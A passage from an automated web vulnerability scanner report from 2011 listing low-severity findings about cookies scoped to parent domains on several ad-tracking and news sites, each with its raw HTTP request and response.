X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:21 GMT; path=/
Set-Cookie: fp=599362::7:IN:::1296392421:1:33; expires=Sat, 30-Apr-2011 13:00:21 GMT; path=/; domain=.wsod.com
Set-Cookie: i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2; expires=Tue, 01-Mar-2011 13:00:21 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

16.31. http://add.my.yahoo.com/rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://add.my.yahoo.com
Path:	/rss

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

B=49rk3tt6k9f9e&b=3&s=sq; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rss HTTP/1.1
Host: add.my.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:21:50 GMT
Set-Cookie: B=49rk3tt6k9f9e&b=3&s=sq; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3312

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

16.32. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; Domain=.revsci.net; Expires=Thu, 22-Jan-2043 01:29:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/ako?activate&csid=A06546 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr; udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; Domain=.revsci.net; Expires=Thu, 22-Jan-2043 01:29:45 GMT; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:29:44 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

16.33. http://alex-johnson.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://alex-johnson.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=71247d98d365d957459ad2146ae86d57; expires=Sat, 25-Jan-2031 02:04:23 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: alex-johnson.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=71247d98d365d957459ad2146ae86d57; expires=Sat, 25-Jan-2031 02:04:23 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close

16.34. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d775684/10/38973908/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Sat, 30-Jan-2010 12:18:56 GMT; path=/; domain=.questionmarket.com
CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com
ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:18:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a222
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 12:18:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1

;

16.35. http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d852149/4/40142779/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Sat, 30-Jan-2010 02:23:02 GMT; path=/; domain=.questionmarket.com
CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com
ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d852149/4/40142779/decide.php?ord=1296350847 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a204
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 02:23:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.36. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296351006.909,wait-%3E10000,&1296351005834 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:30:07 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

16.37. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:30:06 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1296351006; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:30:06 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:30:06 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351006; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26496

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...

16.38. http://articles.redacted/news/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://articles.redacted
Path:	/news/news.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a9c5053b2f704163858001bde4170892; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=FDEFD5726B4F41F2A069537932EBC97A; domain=.moneycentral.msn.com; expires=Thu, 18-Aug-2011 02:05:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news.aspx HTTP/1.1
Host: articles.moneycentral.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA43
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a9c5053b2f704163858001bde4170892; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FDEFD5726B4F41F2A069537932EBC97A; domain=.moneycentral.msn.com; expires=Thu, 18-Aug-2011 02:05:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 39029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.39. http://athima-chansanchai.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://athima-chansanchai.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=604df4063ca91afa132a73bbd94df4dd; expires=Sat, 25-Jan-2031 02:04:32 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: athima-chansanchai.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:32 GMT
